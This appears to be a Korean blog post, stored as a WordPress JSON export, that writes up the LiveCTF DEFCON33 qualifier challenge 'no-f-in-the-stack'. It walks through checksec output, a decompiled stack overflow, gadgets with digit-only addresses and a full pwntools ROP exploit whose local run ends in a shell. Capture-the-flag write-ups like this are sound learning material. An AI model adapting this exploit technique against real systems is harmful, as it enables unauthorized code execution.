{"id":3390,"date":"2025-04-24T03:22:29","date_gmt":"2025-04-23T18:22:29","guid":{"rendered":"https:\/\/h4ck.kr\/?p=3390"},"modified":"2025-04-24T03:22:31","modified_gmt":"2025-04-23T18:22:31","slug":"livectf-defcon33-qualsno-f-in-the-stack","status":"publish","type":"post","link":"https:\/\/h4ck.kr\/?p=3390","title":{"rendered":"[LiveCTF-DEFCON33-Quals]no-f-in-the-stack"},"content":{"rendered":"\n<p>\uce5c\uad6c \uad8c\uc720\ub85c \ud480\uc5b4\ubd04. <br>\uc0c8\ub85c\uc6b4 \uc0ac\uace0 \ubc29\ud5a5\uacfc \uc2dc\uac01\uc744 \ubc14\ub77c\ubcfc \uc218 \uc788\uc5b4 \uc88b\uc558\uc74c.<\/p>\n\n\n\n<p>Thanks, \ud83e\udd54<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">checksec<\/h3>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">ubuntu@64a54bd8db27:~\/study\/LiveCTF-DEFCON33\/qualifiers\/challenges\/no-f-in-the-stack\/challenge\/build$ checksec .\/challenge_real\n[*] '\/home\/ubuntu\/study\/LiveCTF-DEFCON33\/qualifiers\/challenges\/no-f-in-the-stack\/challenge\/build\/challenge_real'\n    Arch:       amd64-64-little\n    RELRO:      No RELRO\n    Stack:      Canary found\n    NX:         NX enabled\n    PIE:        No PIE (0x400000)\n    SHSTK:      Enabled\n    IBT:        Enabled\n    Stripped:   No\n    Debuginfo:  Yes<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Decompiled-src \/ Analysis<\/h3>\n\n\n\n<p><code>uintptr_t stack[3];<\/code> \uc73c\ub85c \uc9c0\uc815\ub418\uc788\ub294\ub370, i\uac00 1000\ubc88\uae4c\uc9c0 \uacc4\uc18d \uc99d\uac00\ud558\uba74\uc11c \uc8fc\uc18c\ub97c \uc785\ub825\ubc1b\uc74c.<br>\u2192 BOF \ucde8\uc57d\uc810 \ubc1c\uc0dd<\/p>\n\n\n\n<p>\ubc1b\uc740 \uc8fc\uc18c\uac00 0\uc774\uba74, for \ub8e8\ud504\ubb38 \uc885\ub8cc.<\/p>\n\n\n\n<p>\uc8fc\uc18c\ub97c 10\uc9c4\uc218\ub85c \uc785\ub825\ubc1b\uc740 \ud6c4, \ub2e4\uc2dc \uadf8 
\ubb38\uc790\uc5f4\uc744 16\uc9c4\uc218\ub85c \ubcc0\ud658\uc2dc\ucf1c <code>stack[i]<\/code>\uc5d0 \uc800\uc7a5\ud568.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">int __fastcall main(int argc, const char **argv, const char **envp)\n{\n  int v3; \/\/ edx\n  int v4; \/\/ ecx\n  int v5; \/\/ r8d\n  int v6; \/\/ r9d\n  int v7; \/\/ edx\n  int v8; \/\/ ecx\n  int v9; \/\/ r8d\n  int v10; \/\/ r9d\n  int v11; \/\/ r8d\n  int v12; \/\/ r9d\n  int v13; \/\/ r8d\n  int v14; \/\/ r9d\n  char v16; \/\/ [rsp+0h] [rbp-60h]\n  char v17; \/\/ [rsp+0h] [rbp-60h]\n  char v18; \/\/ [rsp+0h] [rbp-60h]\n  char v19; \/\/ [rsp+0h] [rbp-60h]\n  char printed_addr[16]; \/\/ [rsp+20h] [rbp-40h] BYREF\n  uintptr_t addr; \/\/ [rsp+38h] [rbp-28h] BYREF\n  uintptr_t stack[3]; \/\/ [rsp+40h] [rbp-20h] BYREF\n  int i; \/\/ [rsp+5Ch] [rbp-4h]\n\n  init();\n  for ( i = 0; i &lt;= 999; ++i )\n  {\n    printf((unsigned int)\"Addr pls: \", (_DWORD)argv, v3, v4, v5, v6, v16);\n    addr = 0;\n    _isoc23_scanf((unsigned int)\"%lu\", (unsigned int)&amp;addr, v7, v8, v9, v10, v17);\n    if ( !addr )\n      break;\n    memset(printed_addr, 0, sizeof(printed_addr));\n    sprintf((unsigned int)printed_addr, (unsigned int)\"%lu\", addr, (unsigned int)\"%lu\", v11, v12, v18);\n    argv = (const char **)\"%lx\";\n    _isoc23_sscanf(\n      (unsigned int)printed_addr,\n      (unsigned int)\"%lx\",\n      (unsigned int)&amp;stack[i],\n      (unsigned int)\"%lx\",\n      v13,\n      v14,\n      v19);\n    if ( !stack[i] )\n      break;\n  }\n  return 0;\n}<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Blah<\/h3>\n\n\n\n<p><code>system(\"\")<\/code>\uc744 \ud638\ucd9c\ud558\ub294 \ud568\uc218.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"asm\" data-enlighter-theme=\"dracula\" 
data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">.text:0000000000401905 ; =============== S U B R O U T I N E =======================================\n.text:0000000000401905\n.text:0000000000401905 ; Attributes: bp-based frame\n.text:0000000000401905\n.text:0000000000401905 ; void __cdecl blah()\n.text:0000000000401905                 public blah\n.text:0000000000401905 blah            proc near\n.text:0000000000401905 ; __unwind {\n.text:0000000000401905                 endbr64\n.text:0000000000401909                 push    rbp\n.text:000000000040190A                 mov     rbp, rsp\n.text:000000000040190D                 lea     rax, unk_4A002C\n.text:0000000000401914                 mov     rdi, rax\n.text:0000000000401917                 call    system\n.text:000000000040191C                 nop\n.text:000000000040191D                 pop     rbp\n.text:000000000040191E                 retn\n...\n.rodata:00000000004A002C unk_4A002C      db    0<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Solution<\/h3>\n\n\n\n<p>\uc2e4\uc81c\ub860 \uc2a4\ud0dd \uce74\ub098\ub9ac\uac00 main \ud568\uc218\uc5d0 \uc801\uc6a9\ub418\uc788\uc9c0 \uc54a\uc544 RET\ub97c \ub36e\uc5b4 RIP \ucee8\ud2b8\ub864 \uac00\ub2a5\ud568. 
<br>\uc911\uc694\ud55c \uc810\uc740 \uc785\ub825\ubc1b\ub294 \uc8fc\uc18c\ub97c \uc2a4\ud0dd\uc5d0 16\uc9c4\uc218 \uac12\uc73c\ub85c \uc800\uc7a5\ud558\ub294\ub370,<br><code>%lu<\/code> 10\uc9c4\uc218\ub85c \ucca8\uc5d0 \uc785\ub825\ubc1b\uae30\uc5d0 \uc54c\ud30c\ubcb3\uc774 \ub4e4\uc5b4\uac00\uba74 \uc548\ub428.<\/p>\n\n\n\n<p>\uc22b\uc790\ub85c\ub9cc \uad6c\uc131\ub41c \uac00\uc82f\uc744 \ucc3e\ub294 \uba85\ub839\uc5b4.<\/p>\n\n\n\n<p><code>ROPgadget --binary .\/challenge_real > gadgets.txt<\/code><br><code>grep -E '^0x[0-9]+ :' gadgets.txt > gadgets2.txt<\/code><\/p>\n\n\n\n<p>\/bin\/sh \uc8fc\uc18c\ub97c 10\uc9c4\uc218\ub85c \uc798 \uc77d\uac8c\ub054 2\uac1c\ub85c \ucabc\uac20\ub2e4\uc74c, \uc544\ub798 3\uac00\uc9c0\uc758 \uac00\uc82f\uc744 \uc870\ud569\ud574 ROP chain\uc73c\ub85c \uc258 \ud68d\ub4dd \uac00\ub2a5\ud558\uc600\ub2e4.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">divided = \"490060\"\ndivided2 = \"10499\"\n\npop_rdi_pop_rbp_ret = \"0000000000402218\"\nadd_rax_rdi_ret = \"0000000000471885\"\nmov_rdi_rax_system = \"0000000000401914\"<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">solve.py<\/h3>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">from pwn import *\ncontext.log_level = 'debug'\ncontext(arch='amd64', os='linux')\nwarnings.filterwarnings('ignore')\n\n# p = remote(\"127.0.0.1\", 1337)\np = process(\".\/challenge_real\")\ne = ELF('.\/challenge_real',checksec=False)\n\ns = lambda str: p.send(str)\nsl = lambda str: p.sendline(str)\nsa = lambda delims, str: p.sendafter(delims, str)\nsla = lambda delims, str: p.sendlineafter(delims, str)\nr = 
lambda numb=4096: p.recv(numb)\nrl = lambda: p.recvline()\nru = lambda delims, drop=True: p.recvuntil(delims, drop)\nuu32 = lambda data: u32(data.ljust(4, b\"\\x00\"))\nuu64 = lambda data: u64(data.ljust(8, b\"\\x00\"))\nli = lambda str, data: log.success(str + \"========>\" + hex(data))\n\npop_rdi_pop_rbp_ret = \"0000000000402218\"\nadd_rax_rdi_ret = \"0000000000471885\"\nmov_rdi_rax_system = \"0000000000401914\"\n\nbin_sh = 0x00000000004A04F9\ndivided = \"490060\"\ndivided2 = \"10499\"\n\n# >>> hex(0x490060 + 0x10499)\n# '0x4a04f9'\n\nsla(b\"Addr pls: \", b\"1010101041424344\")\nsla(b\"Addr pls: \", b\"2020202041424344\")\nsla(b\"Addr pls: \", b\"3030303041424344\")\n\nsla(b\"Addr pls: \", b\"441424344\")    #4 -> RET; $rbp+8, \n\n#rax = 0\nsla(b\"Addr pls: \", pop_rdi_pop_rbp_ret.encode('utf-8'))\nsla(b\"Addr pls: \", divided.encode('utf-8')) #set rdi\nsla(b\"Addr pls: \", b\"4040404041424344\") #set rbp\nsla(b\"Addr pls: \", add_rax_rdi_ret.encode('utf-8'))\n\n#rax = 0x490060\nsla(b\"Addr pls: \", pop_rdi_pop_rbp_ret.encode('utf-8'))\nsla(b\"Addr pls: \", divided2.encode('utf-8')) #set rdi\nsla(b\"Addr pls: \", b\"5050505041424344\") #set rbp\nsla(b\"Addr pls: \", add_rax_rdi_ret.encode('utf-8'))\n\n#rax = 0x490060 + 0x10499 = 0x4a04f9 ('\/bin\/sh')\nsla(b\"Addr pls: \", mov_rdi_rax_system.encode('utf-8'))\nsla(b\"Addr pls: \", b\"0\")\n\np.interactive()<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Result<\/h3>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">ubuntu@64a54bd8db27:~\/study\/LiveCTF-DEFCON33\/qualifiers\/challenges\/no-f-in-the-stack\/challenge\/build$ python3 solve.py\n[+] Starting local process '.\/challenge_real' argv=[b'.\/challenge_real'] : pid 1967\n[DEBUG] 
'\/home\/ubuntu\/study\/LiveCTF-DEFCON33\/qualifiers\/challenges\/no-f-in-the-stack\/challenge\/build\/challenge_real' is statically linked, skipping GOT\/PLT symbols\n[DEBUG] Received 0xa bytes:\n    b'Addr pls: '\n[DEBUG] Sent 0x11 bytes:\n    b'1010101041424344\\n'\n[DEBUG] Received 0xa bytes:\n    b'Addr pls: '\n[DEBUG] Sent 0x11 bytes:\n    b'2020202041424344\\n'\n[DEBUG] Received 0xa bytes:\n    b'Addr pls: '\n[DEBUG] Sent 0x11 bytes:\n    b'3030303041424344\\n'\n[DEBUG] Received 0xa bytes:\n    b'Addr pls: '\n[DEBUG] Sent 0xa bytes:\n    b'441424344\\n'\n[DEBUG] Received 0xa bytes:\n    b'Addr pls: '\n[DEBUG] Sent 0x11 bytes:\n    b'0000000000402218\\n'\n[DEBUG] Received 0xa bytes:\n    b'Addr pls: '\n[DEBUG] Sent 0x7 bytes:\n    b'490060\\n'\n[DEBUG] Received 0xa bytes:\n    b'Addr pls: '\n[DEBUG] Sent 0x11 bytes:\n    b'4040404041424344\\n'\n[DEBUG] Received 0xa bytes:\n    b'Addr pls: '\n[DEBUG] Sent 0x11 bytes:\n    b'0000000000471885\\n'\n[DEBUG] Received 0xa bytes:\n    b'Addr pls: '\n[DEBUG] Sent 0x11 bytes:\n    b'0000000000402218\\n'\n[DEBUG] Received 0xa bytes:\n    b'Addr pls: '\n[DEBUG] Sent 0x6 bytes:\n    b'10499\\n'\n[DEBUG] Received 0xa bytes:\n    b'Addr pls: '\n[DEBUG] Sent 0x11 bytes:\n    b'5050505041424344\\n'\n[DEBUG] Received 0xa bytes:\n    b'Addr pls: '\n[DEBUG] Sent 0x11 bytes:\n    b'0000000000471885\\n'\n[DEBUG] Received 0xa bytes:\n    b'Addr pls: '\n[DEBUG] Sent 0x11 bytes:\n    b'0000000000401914\\n'\n[DEBUG] Received 0xa bytes:\n    b'Addr pls: '\n[DEBUG] Sent 0x2 bytes:\n    b'0\\n'\n[*] Switching to interactive mode\n$ id\n[DEBUG] Sent 0x3 bytes:\n    b'id\\n'\n[DEBUG] Received 0x36 bytes:\n    b'uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu)\\n'\nuid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu)\n$ whoami\n[DEBUG] Sent 0x7 bytes:\n    b'whoami\\n'\n[DEBUG] Received 0x7 bytes:\n    b'ubuntu\\n'\nubuntu\n$ ls\n[DEBUG] Sent 0x3 bytes:\n    b'ls\\n'\n[DEBUG] Received 0x57 bytes:\n    b'challenge\\tcore\\t     
gadgets2.txt  na\\n'\n    b'challenge_real\\tgadgets.txt  libc.so.6\\t   solve.py\\n'\nchallenge\tcore\t     gadgets2.txt  na\nchallenge_real\tgadgets.txt  libc.so.6\t   solve.py\n$  <\/pre>\n","protected":false},"excerpt":{"rendered":"<p>\uce5c\uad6c \uad8c\uc720\ub85c \ud480\uc5b4\ubd04. \uc0c8\ub85c\uc6b4 \uc0ac\uace0 \ubc29\ud5a5\uacfc \uc2dc\uac01\uc744 \ubc14\ub77c\ubcfc \uc218 \uc788\uc5b4 \uc88b\uc558\uc74c. Thanks, \ud83e\udd54 checksec Decompiled-src \/ Analysis uintptr_t stack[3]; \uc73c\ub85c \uc9c0\uc815\ub418\uc788\ub294\ub370, i\uac00 1000\ubc88\uae4c\uc9c0 \uacc4\uc18d \uc99d\uac00\ud558\uba74\uc11c \uc8fc\uc18c\ub97c \uc785\ub825\ubc1b\uc74c.\u2192 BOF \ucde8\uc57d\uc810 \ubc1c\uc0dd \ubc1b\uc740 \uc8fc\uc18c\uac00 0\uc774\uba74, for \ub8e8\ud504\ubb38 \uc885\ub8cc. \uc8fc\uc18c\ub97c 10\uc9c4\uc218\ub85c \uc785\ub825\ubc1b\uc740 \ud6c4, \ub2e4\uc2dc \uadf8 \ubb38\uc790\uc5f4\uc744 16\uc9c4\uc218\ub85c \ubcc0\ud658\uc2dc\ucf1c stack[i]\uc5d0 \uc800\uc7a5\ud568. Blah system(\u201d\u201d)\uc744 \ud638\ucd9c\ud558\ub294 \ud568\uc218. 
Solution \uc2e4\uc81c\ub860 \uc2a4\ud0dd \uce74\ub098\ub9ac\uac00&hellip;&nbsp;<a href=\"https:\/\/h4ck.kr\/?p=3390\" rel=\"bookmark\">\ub354 \ubcf4\uae30 &raquo;<span class=\"screen-reader-text\">[LiveCTF-DEFCON33-Quals]no-f-in-the-stack<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"neve_meta_sidebar":"","neve_meta_container":"","neve_meta_enable_content_width":"","neve_meta_content_width":0,"neve_meta_title_alignment":"","neve_meta_author_avatar":"","neve_post_elements_order":"","neve_meta_disable_header":"","neve_meta_disable_footer":"","neve_meta_disable_title":"","footnotes":""},"categories":[19],"tags":[25],"class_list":["post-3390","post","type-post","status-publish","format-standard","hentry","category-ctf-private","tag-pwnable"],"_links":{"self":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3390","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3390"}],"version-history":[{"count":1,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3390\/revisions"}],"predecessor-version":[{"id":3391,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3390\/revisions\/3391"}],"wp:attachment":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3390"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3390"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3390"}],"curies":[{"name":"wp","href
":"https:\/\/api.w.org\/{rel}","templated":true}]}}